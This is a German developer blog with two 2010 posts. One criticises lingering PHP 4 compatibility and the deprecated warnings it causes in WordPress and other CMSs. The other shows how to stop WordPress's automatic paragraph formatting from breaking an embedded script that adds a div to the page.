Zur Zeit arbeite ich an einem Wordpress-Projekt und bin nach der Umstellung auf PHP 5.3 (vorher war versehentlich PHP 4 auf dem Webspace aktiv) über etliche Deprecated-Warnungen gestolpert. Die explizite Zuweisung von Objekten per Referenz (also mit =& statt dass das Objekt mit = geklont wird) in der wp-settings.php ist schuld, denn dieses im Grunde erwartungskonforme Verhalten ist seit PHP 5 der Normalfall, Objekte werden jetzt nur noch geklont, wenn man explizit clone benutzt, so dass die explizite Zuweisung per Referenz überflüssig ist und angemahnt wird.

Nun ist es bei einem guten Hoster ein Handgriff ein, die E_DEPRECATED-Warnungen in der php.ini zu unterdrücken, von daher ist das alles halb so wild. Die Sache ist aber ein Symptom eines großen Dilemmas: Will man – aus welchen Gründen auch immer – kompatibel zu PHP 4 bleiben, muss man manchmal Code schreiben, der in PHP ab 5.3 eine Deprecated-Warnung wirft. Das TYPO3-Backend beispielsweise warf bis vor kurzem (vielleicht auch immer noch) ebenfalls Unmengen an Deprecated-Warnungen, weil es intensiven Gebrauch von eregi-Funktionen macht. Die kann man mit gutem Geschwindigkeitsgewinn und ohne Schwierigkeiten mit PHP 4 gegen preg-Funktionen austauschen, hier ist es also lediglich eine Sache von Fleiß; ganz davon abgesehen, dass TYPO3 sowieso seit Jahren kein PHP 4 mehr unterstützt. Die Sache bei Wordpress und einigen anderen Projekten mit Objektorientierten Elementen ist aber eine Zwickmühle.

Wobei es in meinen Augen keineswegs eine Zwickmühle ist, da die Lösung auf der Hand liegt: Man wirft einfach den PHP 4 Support über Bord und hält die Anfeindungen einiger Ewiggestriger aus, die nicht wissen, wie sie bei ihren Webspace eine aktuelle PHP-Version umstellt. Diese Anfeindungen kommen leider vor, und sind einer der Gründe, wieso ich zu Serendipity keinen Code mehr beitrage. Serendipity bewahrt wie Wordpress noch immer die PHP 4 Kompatibilität und steht einer zukunftsgerichteten Weiterentwicklung damit massiv im Weg. Wordpress wird wohl ab Version 3.0 (also ab demnächst) PHP 5 vorraussetzen, damit es endlich nach vorne gehen kann. Das ist im Falle von Wordpress auch bitter nötig, wenn man sich den mitunter grauenerregenden Code anguckt. Die aktuelle Beta 1 wirft aber leider immer noch die Deprecated-Warnungen.

Es gibt so etwas wie Codehygiene. Ich frage mich, wieso sich so viele Softwareprojekte mit aller Macht dagegen stemmen, ihren Code ein wenig zu warten. Eregi-Funktionen gelten schon seit mindestens fünf Jahren als um Größenordnungen langsamer, als ihre preg-Pendants. Wieso zur Hölle liest man dann als Abhilfe für Deprecated-Meldungen immer und überall, dass man die Warnungen ausschalten soll? Wo ist das Problem, sich einmal eine Nacht hinzusetzen und die veralteten und langsamen eregi-Funktionen zu eliminieren? Wieso wird unter Verzicht auf fundamental wichtige Programmiertechniken der Objektorientierung auch mehrere Jahre nach Einstellung des Supports für PHP 4 so sehr daran geklebt? PHP 4 ist veraltet, langsam und behindert massivst eine saubere Programmierung. Das ist sogar so offensichtlich, dass es jedem auffallen müsste, der nur ansatzweise objektorientiert mit PHP programmiert. PHP 4 fehlt es an fundamentalen Funktionalitäten an allen Ecken und Enden, nicht nur bei der Objektorientierung. Bitte, hört auf mit der falsch verstandenen Rückwärtskompatibilität und blickt mal nach vorne.

P.S. Ich bin übrigens latent auf der Suche nach einem neuen Blogsystem. Serendipity möchte ich den Rücken kehren, weil sich an der Front scheinbar nichts mehr tun wird. Auf PHP 5 umstellen? Neue Programmierkonzepte zulassen? Nix da, alles bleibt, wie es ist. Ein System, dessen Core so ungerne angefasst wird, ist nicht meins. Davon abgesehen, dass der Core in meinen Augen sowieso gar kein HTML ausgeben sollte. S9Y ist super stabil und funktioniert bei mir seit nunmehr fast sechs Jahren ohne jedes nennenswerte Problem vor sich hin, aber in etwa so lange hat sich auch nicht mehr wirklich etwas nennenswertes weiter entwickelt; das stimmt zwar nicht ganz, aber die Änderungen blieben insgesamt doch sehr dezent. Wordpress ist leider keine Alternative, auch wenn das Backend großartig ist. Ein Blick in den Core an beliebiger Stelle sollte ausreichend Anlass geben, das System nicht zu wollen. Was ist eigentlich aus Habari geworden?


Wordpress macht jQuery-Code in Posts kaputt

29 04 2010

Heute musste ich in einem Wordpress-Eintrag ein kleines jQuery Script einbauen, wofür ich erst mal ein DIV an den BODY anhängen musste. Im Grunde macht man sowas in jQuery mit folgendem Code:

<script>
  jQuery('<div id="soundso" class="undsoso"></div>').appendTo('body');
</script>

Leider fährt einem Wordpress hier an die Karre, wenn man das in den Post-Editor einfügt (davon abgesehen, dass sowieso alles kaputt ist, wenn man den WYSIWTFWYSIWYG-Editor benutzt). Die Automatik, die Ps um die Absätze macht, grätscht hier rein und fummelt da irgendwie noch ein p mit rein, wo es einem einen JavaScript-Fehler einbringt. Eine andere Weise, dieses DIV zu erzeugen, scheiterte an anderen Randbedingungen oder wäre sehr unelegant gewesen, deswegen musste ich das irgendwie hinbekommen. Da Wordpress normalen JavaScript-Code in Frieden lässt, habe ich letztlich auf die Standard-JavaScript-Methode zurückgegriffen, wie man DOM-Elemente erzeugt. Das sieht dann so aus:

<script>
  var d = document.createElement('div');
  d.id = 'soundso';
  d.className = 'undsoso';
  document.body.appendChild(d);
</script>

Wenn man es so macht, lässt Wordpress den Code passieren, ohne daran wohlmeinend herumzufummeln. Eine andere Möglichkeit ist das PlugIn Text Control, das auf Pro-Post-Basis die Textformatierungen abschalten kann. Das Plugin scheint auf den ersten Blick trotz des Alters (es ist von 2005) mit einem aktuellen Wordpress zu funktionieren, aber leider bietet es seine Dienste nur für Posts an und nicht für statische Seiten.

Nachtrag 06.05.2010: Man kann auch einfach radikal wie wpautop-Funktion deaktivieren, etwa mit diesem PlugIn. Das automatische rein pfriemeln von Absätzen ist nett gemeint, aber es schadet in der Praxis mehr, als es nützt; zumindest in meiner Praxis.